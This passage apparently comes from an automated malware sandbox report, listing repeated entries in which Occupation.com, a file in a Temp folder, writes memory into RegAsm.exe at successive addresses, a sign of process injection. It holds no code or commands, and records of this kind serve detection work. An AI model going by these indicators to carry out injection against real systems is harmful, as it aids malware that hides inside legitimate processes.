                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9677EC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967850
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9678B4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967918
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96797C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9679E0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967A44
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967AA8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967B0C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967B70
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967BD4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967C38
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967C9C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967D00
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967D64
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967DC8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967E2C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967E90
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967EF4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967F58
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967FBC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968020
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968084
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9680E8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96814C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9681B0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968214
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968278
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9682DC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968340
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9683A4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968408
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96846C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9684D0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968534
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968598
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9685FC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968660
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9686C4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968728
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96878C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9687F0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968854
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9688B8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96891C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968980
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9689E4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968A48
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968AAC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968B10
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968B74
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968BD8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968C3C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968CA0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968D04
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968D68
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968DCC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968E30
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968E94
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968EF8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968F5C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968FC0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969024
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969088
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9690EC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969150
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9691B4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969218
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96927C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9692E0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969344
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9693A8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96940C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969470
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9694D4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969538
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96959C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969600
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969664
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9696C8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96972C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969790
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9697F4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969858
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9698BC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969920
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969984
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9699E8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969A4C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969AB0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969B14
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969B78
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969BDC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969C40
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969CA4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969D08
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969D6C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969DD0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969E34
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969E98
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969EFC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969F60
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969FC4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A028
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A08C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A0F0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A154
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A1B8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A21C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A280
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A2E4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A348
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A3AC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A410
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A474
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A4D8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A53C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A5A0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A604
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A668
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A6CC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A730
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A794
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A7F8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A85C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A8C0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A924
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A988
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A9EC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AA50
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AAB4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AB18
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AB7C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96ABE0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AC44
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96ACA8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AD0C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AD70
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96ADD4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AE38
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AE9C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AF00
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AF64
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AFC8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B02C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B090
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B0F4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B158
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B1BC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B220
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B284
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B2E8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B34C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B3B0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B414
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B478
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B4DC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B540
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B5A4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B608
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B66C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B6D0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B734
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B798
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B7FC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B860
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B8C4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B928
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B98C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B9F0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BA54
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BAB8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BB1C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BB80
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BBE4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BC48
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BCAC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BD10
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BD74
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BDD8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BE3C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BEA0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BF04
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BF68
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BFCC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C030
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C094
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C0F8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C15C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C1C0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C224
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C288
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C2EC
